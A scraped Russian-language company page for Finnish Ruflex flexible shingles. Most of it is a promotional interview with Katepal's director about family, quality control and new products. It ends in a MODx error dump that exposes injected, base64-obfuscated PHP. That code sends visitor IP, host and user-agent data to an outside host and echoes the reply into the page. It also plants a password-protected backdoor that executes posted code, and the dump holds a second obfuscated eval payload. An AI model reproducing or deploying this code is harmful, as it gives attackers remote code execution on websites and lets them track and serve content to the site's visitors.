Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

18/04/2006. Стать лидером в отрасли мягкой кровли и было моей целью и целью всей компании

завод мягкой кровли катепал

гибкая 
черепица руфлекс из финляндииГибкая черепица Руфлекс от завода Катепал… Эта фраза стала синонимом высочайшего финского качества и современного дизайна для специалистов кровельного рынка России и стран СНГ. Более 60% строителей и архитекторов знают марку RUFLEX и предпочитают работать исключительно с ней. Тем не менее, о самом заводе известно не так много. Чтобы российские потребители ближе узнали о тех людях, которые создают эту прекрасную черепицу, мы побеседовали с директором завода Katepal OY, господином Ахти Кеконеном. Были затронуты самые разные темы как профессиональные, так и общечеловеческие: дом и семья.

- Российские люди воспринимают свой дом, как часть семейных ценностей, а крышу, как важную часть дома, как семейный талисман: она защищает дом от непогоды. В старину крышу описывали как кладезь семейной мудрости. Для любой семьи собственный дом очень ценен и крыша, как часть дома, тоже. Какие ценности и традиции, связанные с крышей, есть у финского народа?

Ahti Kekonen (А.К.): Я думаю, что российский и финский народы очень близки по духу и их семейные ценности и традиции схожи. Действительно, крыша это не только защита от нашего прохладного, ветреного и дождливого климата. Для меня семья – это центр жизни, дом – семейный замок, крепость, ее надежная защита, а крыша - самая важная часть дома. И, кстати, я знаю вашу поговорку… «Иметь крышу над головой». Финны тоже так говорят!

- Большинство бизнесменов полагают, что хорошие отношения в семье отражаются на успехе в бизнесе. Как Вы считаете, так ли это? Какие у Вас ценности в семье и в бизнесе?

кровельные материалы из финляндииA. K.: Если в доме царит понимание, уважение и любовь, то и бизнес будет успешным и эффективным. Я думаю, что нужно уметь правильно распределять свое время между семьей, работой и досугом. Для меня, как для мужчины и главы семейства важным аспектом является крепкая и любящая семья, здоровье моих родных, а как для бизнесмена, профессиональный успех и достижение поставленных задач. Я уверен, что семейное благополучие, напрямую влияет на Ваш успех в работе и наоборот. И еще, я знаю, что главное, всегда оставаться самим собой. Мы должны быть честны по отношению к себе и к другим.

- Расскажите нам о миссии Вашей компании?

A. K.: Завод Katepal OY - ведущий производитель гибкой черепицы и гидроизоляционных материалов в Скандинавии. Стать лидером в этой отрасли и было моей целью и целью всей компании. Все вместе мы ее осуществили! Наша компания поставляет нашим клиентам продукты и услуги наивысшего качества, соответствующие их требованиям и потребностям. Для нас главными задачами являются: всегда поддерживать высокое качество продукции и своевременно поставлять ее нашим клиентам и партнерам.

кровля руфлекс- Сегодня все больше людей выбирают недвижимость за городом, на природе. Расскажите, пожалуйста, о перспективах рынка строительных материалов и, особенно, о перспективе кровельных материалов через 30-50 лет?

A. K.: Сейчас уровень жизни населения растет, многие пытаются воплотить свои мечты в жизнь и переезжают в собственный загородный дом. Я полагаю, что в будущем эта тенденция будет расти и, конечно, это положительно скажется на продажах гибкой, битумной черепицы и других строительных материалов. Усиливающейся тенденцией в будущем будет наличие двух домов у семьи – квартиры в городе и загородного дома.

С другой стороны 30 - 50 лет это длинный отрезок времени, нельзя с уверенностью сказать, что будет модным, как поменяются вкусы и предпочтения людей, как изменится уровень жизни. В одном могу быть уверен, что несмотря ни на какие перемены и в будущем для всех нас будет важна надежная и красивая кровля.

- Сегодня множество компаний обращают свое внимание на традиции, командный дух в компании. Расскажите нам о традициях Вашей компании?

A. K.: Компания Katepal существует почти 60-лет. Katepal зарекомендовал себя, как надежный партнёр, на нашем производстве занято большое количество людей, некоторые работают уже во втором поколении. Мы всегда поощряем своих сотрудников за хорошую работу, а это в свою очередь стимулирует их на достижение новых результатов.

Каждый год наша компания поздравляет своих сотрудников с праздниками и дарит им подарки, не забывая и о тех, кто уже вышел на пенсию. Мы устраиваем коллективные мероприятия, вечеринки для всех своих работников. Особенно мы любим рождественские праздники. А в летнее время всем коллективом устраиваем корпоративный отдых на открытом воздухе – купаемся, ходим в сауну, устраиваем застолье, позволяя себе «немного» расслабится.

- Katepal известен как компания, использующая новейшие технологии. Идти в ногу со временем - это также одна из ваших традиций?

черепица 
катепалA. K.: Я бы не назвал это традицией, скорее долгосрочной стратегией нашей компании. Новейшие технологии – это прерогатива нашей компании.

- Известно, что законодательство по защите окружающей среды достаточно строго относится к деятельности большинства производственных компаний. Какие требования предъявляются к Вам?

A. K.: Знаете, в Финляндии очень строгие законы по охране окружающей среды. В этом году мы получили Экологическое разрешение от властей, оно устанавливает жёсткие требования к действиям компании. Руководство компании Katepal всегда с большим вниманием относилось к защите флоры и фауны. В течение всей истории деятельности нашей компании мы принимали во внимание все экологические аспекты и выполняли все требования для того, чтобы наша деятельность не наносила вред экологии нашей страны и ее природе.

- Katepal OY известен в России как производитель кровельной продукции высшего качества. Каким образом Вы контролируете качество своей продукции?

A. K.: И не только в России, а больше чем в 25 странах мира. Контроль качества выпускаемой продукции - очень важный вопрос, который невозможно охватить в одном интервью. Наша цель – это производство товаров высшего качества. Мы осуществляем контроль на всех трех стадиях производства: контроль качества поставляемого сырья, производственный контроль и финальная стадия - контроль готовой продукции. Этот процесс включает в себя проведение всевозможных тестирований. Например, каждый продукт (будь-то гонт или рулон) взвешивается и проверяется, а результат регистрируется в базе данных проверки качества для нашей статистики, которую мы постоянно ведем.

- Качество черепицы зависит от характеристик всех её компонентов. Какие требования Вы выдвигаете вашим поставщикам?

A. K.: Да, вы абсолютно правы. Поддержание уровня качества напрямую зависит от того, как и из каких материалов, мы производим гибкую черепицу. Мы устанавливаем определенные технические требования ко всем компонентам и принимаем новое сырье только на основании успешных производственных испытаний. При получении каждой партии продукции осуществляется проверка качества. Если сырье не отвечает нашим требованиям, то мы не используем его в нашем производстве.

- Расскажите о товарах, которые вы предполагаете выпустить в этом году и о тех новинках, которые уже представлены Российскому потребителю?

В этом году вниманию Российских потребителей была представлена новая коллекция гибкой черепицы Ruflex Super Foxy. Она уникальна - новая черепица отличается изящной формой и многообразием цветовой гаммы. Не в наших правилах останавливаться на достигнутом, поэтому наша команда постоянно работает над модернизацией завода, изобретением новых технологий, над обновлением продукции и повышением качества наших товаров.

Мы всегда стараемся приятно удивлять своих клиентов и партнеров!

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0030 s(1 Requests)
  PHP: 0.2590 s 
  Total: 0.2620 s